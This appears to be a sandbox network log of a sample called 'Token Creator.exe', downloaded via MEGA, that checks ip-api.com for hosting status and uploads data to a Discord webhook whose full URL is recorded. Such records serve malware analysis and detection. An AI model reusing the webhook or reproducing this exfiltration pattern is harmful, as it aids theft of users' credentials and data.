date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 5917
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-171d"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-list-3d.1cbacc9ad7207808.png

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/mega-icons-3d-icon-list-3d.1cbacc9ad7207808.png HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 2214
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-8a6"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-lightbulb-3d.bd8de57b8b075f61.png

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/mega-icons-3d-icon-lightbulb-3d.bd8de57b8b075f61.png HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 3212
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-c8c"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/images/mega/dialog-sprite.png?v=57a6bd1346996955

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/images/mega/dialog-sprite.png?v=57a6bd1346996955 HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 30699
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-77eb"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/imagery/sprites-fm-uni-uni.7f8cc5f80c3e4888.svg

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/sprites-fm-uni-uni.7f8cc5f80c3e4888.svg HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/svg+xml
content-length: 43528
last-modified: Thu, 19 Dec 2024 03:31:24 GMT
vary: Accept-Encoding
etag: "6763938c-aa08"
content-encoding: gzip
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
GET

https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-key-3d.10e986479b570c8a.png

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/mega-icons-3d-icon-key-3d.10e986479b570c8a.png HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 3159
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-c57"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-illustration-s4-3d.54642885c7fc0200.png

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/imagery/mega-icons-3d-illustration-s4-3d.54642885c7fc0200.png HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/png
content-length: 21142
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-5296"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/images/mobile/button-loader-green.gif?v=b175f7d362d2b4af

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/images/mobile/button-loader-green.gif?v=b175f7d362d2b4af HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://mega.nz/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:39 GMT
content-type: image/gif
content-length: 8787
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-2253"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
GET

https://eu.static.mega.co.nz/4/images/mega/icons-sprite.png?v=48528e60724d858e

msedge.exe

Remote address:

66.203.127.11:443

Request

GET /4/images/mega/icons-sprite.png?v=48528e60724d858e HTTP/2.0
host: eu.static.mega.co.nz
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9

Response

HTTP/2.0 200

server: nginx
date: Wed, 25 Dec 2024 10:53:43 GMT
content-type: image/png
content-length: 118009
last-modified: Thu, 19 Dec 2024 00:48:49 GMT
etag: "67636d71-1ccf9"
access-control-allow-origin: *
access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept
accept-ranges: bytes
DNS

gfs208n104.userstorage.mega.co.nz

msedge.exe

Remote address:

8.8.8.8:53

Request

gfs208n104.userstorage.mega.co.nz

IN A

Response

gfs208n104.userstorage.mega.co.nz

IN A

185.206.26.14
POST

https://gfs208n104.userstorage.mega.co.nz/dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/0-131071

msedge.exe

Remote address:

185.206.26.14:443

Request

POST /dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/0-131071 HTTP/1.1
Host: gfs208n104.userstorage.mega.co.nz
Connection: keep-alive
Content-Length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 131072
Content-Type: application/octet-stream
Content-Disposition: attachment
Cache-Control: private
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Cache-Control: no-store
POST

https://gfs208n104.userstorage.mega.co.nz/dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/131072-168058

msedge.exe

Remote address:

185.206.26.14:443

Request

POST /dl/vC_wKJ4ln1aOPgIIAvdcD_Fpv6UX9j5f7i-hQf9Z8L__cTWyyo0orDtRGtYwCnoym1i-25k-IgMdtKXyXZaqBsM01EypG6ocHhWZuPIGhscjHJd3HX_ZfIBUBZpkVw/131072-168058 HTTP/1.1
Host: gfs208n104.userstorage.mega.co.nz
Connection: keep-alive
Content-Length: 0
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://mega.nz
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mega.nz/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 36987
Content-Type: application/octet-stream
Content-Disposition: attachment
Cache-Control: private
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: MEGA-Chrome-Antileak
Access-Control-Max-Age: 86400
Cache-Control: no-store
DNS

14.26.206.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.26.206.185.in-addr.arpa

IN PTR

Response
DNS

gstatic.com

Token Creator.exe

Remote address:

8.8.8.8:53

Request

gstatic.com

IN A

Response

gstatic.com

IN A

142.250.74.227
GET

https://gstatic.com/generate_204

Token Creator.exe

Remote address:

142.250.74.227:443

Request

GET /generate_204 HTTP/1.1
Host: gstatic.com
Connection: Keep-Alive

Response

HTTP/1.1 204 No Content

Content-Length: 0
Cross-Origin-Resource-Policy: cross-origin
Date: Wed, 25 Dec 2024 10:54:01 GMT
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

13.86.106.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

13.86.106.20.in-addr.arpa

IN PTR

Response
DNS

ip-api.com

Token Creator.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/line/?fields=hosting

Token Creator.exe

Remote address:

208.95.112.1:80

Request

GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Wed, 25 Dec 2024 10:54:01 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

227.74.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

227.74.250.142.in-addr.arpa

IN PTR

Response

227.74.250.142.in-addr.arpa

IN PTR

par10s40-in-f31e100net
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
GET

http://ip-api.com/json/?fields=225545

Token Creator.exe

Remote address:

208.95.112.1:80

Request

GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Wed, 25 Dec 2024 10:54:03 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 163
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
DNS

discord.com

Token Creator.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.136.232
POST

https://discord.com/api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns

Token Creator.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 941
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Wed, 25 Dec 2024 10:54:04 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1735124046
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cm4UrrQkXMObgUDe87lmBevuH9L2a5Bik1ba5Cbq8RSKQSaYjlVNp1b2FbqiGeFQKTPcWPhINFZH2IpJ6co5vx4zgiH8%2BBKi7woIFMcvlAfBDOLjSxwznCLxq92q"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=6622cce6d9bd04ba571bfb6c5abb28ee8b45d9f2-1735124044; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=54weq3EbNCjaCIc5lPl6sar7BwXnbscVjxyqZNcFDn0-1735124044891-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8f784a7f9b6dd1f9-LHR
POST

https://discord.com/api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns

Token Creator.exe

Remote address:

162.159.138.232:443

Request

POST /api/webhooks/1275875655388631121/GOJlkEk8aOO38GLqQLPI8bq6mzjW5J-lb9x4jd_m5dhdh_Y7qsx5YMoq8Z92UhSeiMns HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: multipart/form-data; boundary="dae86dd7-b18c-49ac-bee7-51f49e90dcc9"
Host: discord.com
Cookie: __cfruid=6622cce6d9bd04ba571bfb6c5abb28ee8b45d9f2-1735124044; _cfuvid=54weq3EbNCjaCIc5lPl6sar7BwXnbscVjxyqZNcFDn0-1735124044891-0.0.1.1-604800000
Content-Length: 78766
Expect: 100-continue

Response

HTTP/1.1 404 Not Found

Date: Wed, 25 Dec 2024 10:54:05 GMT
Content-Type: application/json
Content-Length: 45
Connection: keep-alive
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1735124046
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0EVGV3MrLXYm1CduXAiR6LE6mcSCGHzy1i5458poN3CjuK44GAYU3%2FNUwefi9cQoYCNreWU945NAX1adn9MRvNMeMMVnZXdRedupWIE0qH7eAC%2FypaE2%2FKOUeWrj"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Server: cloudflare
CF-RAY: 8f784a80ce39d1f9-LHR
DNS

232.138.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.138.159.162.in-addr.arpa

IN PTR

Response
DNS

53.210.109.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

53.210.109.20.in-addr.arpa

IN PTR

Response
DNS

18.31.95.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

18.31.95.13.in-addr.arpa

IN PTR

Response

31.216.145.5:443

https://mega.nz/aesasm.js

tls, http

msedge.exe

7.3kB
99.7kB
49
79

HTTP Request

GET https://mega.nz/file/ozNUBJZL

HTTP Response

200

HTTP Request

GET https://mega.nz/secureboot.js?r=1734569151

HTTP Response

200

HTTP Request

GET https://mega.nz/loading-sprite_light.png

HTTP Response

200

HTTP Request

GET https://mega.nz/favicon.ico?v=3

HTTP Response

200

HTTP Request

GET https://mega.nz/android-chrome-144x144.png

HTTP Response

200

HTTP Request

GET https://mega.nz/sw.js?v=1

HTTP Response

200

HTTP Request

GET https://mega.nz/decrypter.js

HTTP Response

200

HTTP Request

GET https://mega.nz/aesasm.js

HTTP Response

200
31.216.145.5:443

https://mega.nz/manifest.json

tls, http

msedge.exe

1.4kB
4.3kB
7
7

HTTP Request

GET https://mega.nz/manifest.json

HTTP Response

200
66.203.127.11:443

https://eu.static.mega.co.nz/4/fonts/Lato-Semibold.woff2?v=7194963095272d0e

tls, http2

msedge.exe

77.3kB
2.9MB
1577
2094

HTTP Request

GET https://eu.static.mega.co.nz/4/lang/en_11f7cca2eeb2905dc77b9db513d6a198d969680f9bf3d3d1fa87f1f226b82818.json

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-1_84fe11c3c1917aecac92a2dbbe7792e9f6996f187125dd122ecd6cfe18019726.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-2_eea10faf2aaaa936c46e5138f7ed5ca0bbab294163d18b4b739f63e7083975f7.js

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-3_42751776233fcb9a480f5ab8ebae727f6392c914e4b8a535bdef5125e78113b3.js

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-4_1a3426ce2ce9d9275449a26008c6692de93968c603189fd38bc81f0a5babd6ca.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-5_4cb5522e1082f1ba951ba7938584ee9371d5d976686ad3db69cd47ef04a6ff8d.js

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-6_3ef80c9b730a18ab36875080d7dad08d17a9f64c6ae86bb3347728dfcc6ca7f0.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-7_eb91e2702f3cab053d6dd5fb240d8eb4bc568cbadc7cc8d389d94ca2bf411e0a.js

HTTP Request

GET https://eu.static.mega.co.nz/4/css/mega-1_92dafd33b7f185ab9cf118f645668dc83a072936a1eae5a5e146ac2cffce3bc3.css

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/html/templates_c89ae1c612ddc3e756d1a2d48b509e691a13ebb02391239e2ffb1e52c94f0f49.json

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-8_e6c50968bfa5e71ce6c840594b820d67c44e382b4e304640204859c097b24a26.js

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-9_01a59da23c0750e38ea764d4daf9d6f282d62c73b3495ab1d93f13b844ef79a6.js

HTTP Request

GET https://eu.static.mega.co.nz/4/css/bottom-pages-animations.css-postbuild_077437ba5398f2997efea39e55f89eadd473667177aba0b14a48c8b57c60af43.css

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-10_be42da38e225d60bb30921c61a1ac19ec04e63dbc0dd1829fb5c0a2f4e2f7552.js

HTTP Request

GET https://eu.static.mega.co.nz/4/css/mega-2_39c0da4074eb66e58bbdcc6eaaef1ae9931add05ca46b09d4d2f36a3fe621575.css

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-11_0c1df06f65bb9622fb152174fa4f2df6dbfbf31b0adc5f5822e3b01aba3ed294.js

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-12_8c600360713c203c7887aee2a1d38048b05cb34f6923bcfba3040fc3457ada2a.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-13_4eeaeec393a7dff805017453b32b8a31b3d331d019ad10bfe7716b610f74a8ee.js

HTTP Request

GET https://eu.static.mega.co.nz/4/css/mega-3_d9ebf5a3a9f20dca5eb7ef37e5aedc92373d364931527c845afc9264614abb78.css

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-14_0cdb3938fad1fff0fa8762fd66decaa1650272cb5f9e11dd4b7c775a0f0e4441.js

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-15_21564bc837564867637255a20bb45823e8d7271f6310afb06627c55e35ccdbe5.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-16_d87992d41e36491dde8b395476e2af0e15ca589d74f4787e840d9604b6d392e9.js

HTTP Request

GET https://eu.static.mega.co.nz/4/css/mega-4_ad60d99ac801a35d188835856d97ce40fe5f50f69a9e37dbf4d28e9db1240197.css

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/images/mega/contact-avatar_18cc8179fdcf896e202df0bee3a8a381667c7ab2e8206b7b157494d10beeae12.svg

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-17_155e5bc2fea865cacce19a492317f3ae732c229f8dd31a047dea9ae7d4df9a07.js

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/mega-18_f58bc7165c15ed61d22779f4b4905ae8c29472f764eddcdfa75131b4bc809b57.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/css/mega-5_746444f1707f6a414733d026528b76fc2f2d99f5e98d03848e37574ab91cd1e6.css

HTTP Request

GET https://eu.static.mega.co.nz/4/css/mega-8_3520945cea4fadacd5f231298f6864bce128246889b5a900dd04a789d46b564e.css

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/vendor/asmcrypto_9c90f27443fbdb85519985333a8b00c3cff0e10a2753955f41890342d64362f7.js

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/js/vendor/scheduler-polyfill_66da9107c97037dacd222b1f39336ce288eb8216b37b7120e81d62ee5dccf82c.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/html/download.html-postbuild_a038856348bf04158bd3baa908b7d894881308c37f62bdc249c1942ee43a1f27.html

HTTP Request

GET https://eu.static.mega.co.nz/4/html/js/download_d68ea012b36fc8925130210f60c590ff2288fb4c660b9029f75ba828d0cc0597.js

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/fonts/SourceSansPro-Regular.woff2?v=f71f612f60d5bb7e

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/sprites-fm-mono.df524ef39720a347.woff2?h=fe3fc618a

HTTP Request

GET https://eu.static.mega.co.nz/4/fonts/Lato-Regular.woff2?v=6343dd45044b0726

HTTP Request

GET https://eu.static.mega.co.nz/4/fonts/Lato-Semibold.woff2?v=7194963095272d0e

HTTP Response

200

HTTP Response

200

HTTP Response

200
66.203.127.11:443

eu.static.mega.co.nz

tls

msedge.exe

1.1kB
6.1kB
11
10
66.203.125.14:443

https://g.api.mega.co.nz/cs?id=0

tls, http

msedge.exe

1.6kB
6.4kB
8
9

HTTP Request

POST https://g.api.mega.co.nz/cs?id=0

HTTP Response

200
66.203.125.14:443

https://g.api.mega.co.nz/cs?id=73989031&v=3&lang=en&domain=meganz&bb=3

tls, http

msedge.exe

3.9kB
8.1kB
13
14

HTTP Request

POST https://g.api.mega.co.nz/cs?id=0&v=2

HTTP Response

200

HTTP Request

POST https://g.api.mega.co.nz/cs?id=73989029&v=3&lang=en&domain=meganz&bb=3

HTTP Response

200

HTTP Request

POST https://g.api.mega.co.nz/cs?id=73989030&v=3&lang=en&domain=meganz&bb=3

HTTP Response

200

HTTP Request

POST https://g.api.mega.co.nz/cs?id=73989031&v=3&lang=en&domain=meganz&bb=3

HTTP Response

200
66.203.127.11:443

https://eu.static.mega.co.nz/4/images/mega/icons-sprite.png?v=48528e60724d858e

tls, http2

msedge.exe

7.8kB
367.8kB
125
275

HTTP Request

GET https://eu.static.mega.co.nz/4/images/sprites/fm-illustration-sprite-wide.svg?v=e397e234dc118de4

HTTP Request

GET https://eu.static.mega.co.nz/4/images/mega/download-dialog.png?v=cf6daa0027e27782

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/sprites-fm-mime-90-uni.decaf26625f7b9e2.svg

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-bucket-3d.309b7aad111304f7.png

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-list-3d.1cbacc9ad7207808.png

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-lightbulb-3d.bd8de57b8b075f61.png

HTTP Request

GET https://eu.static.mega.co.nz/4/images/mega/dialog-sprite.png?v=57a6bd1346996955

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/sprites-fm-uni-uni.7f8cc5f80c3e4888.svg

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-icon-key-3d.10e986479b570c8a.png

HTTP Request

GET https://eu.static.mega.co.nz/4/imagery/mega-icons-3d-illustration-s4-3d.54642885c7fc0200.png

HTTP Request

GET https://eu.static.mega.co.nz/4/images/mobile/button-loader-green.gif?v=b175f7d362d2b4af

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Response

200

HTTP Request

GET https://eu.static.mega.co.nz/4/images/mega/icons-sprite.png?v=48528e60724d858e

HTTP Response

200
127.0.0.1:6341

msedge.exe
127.0.0.1:6341

msedge.exe
185.206.26.14:443

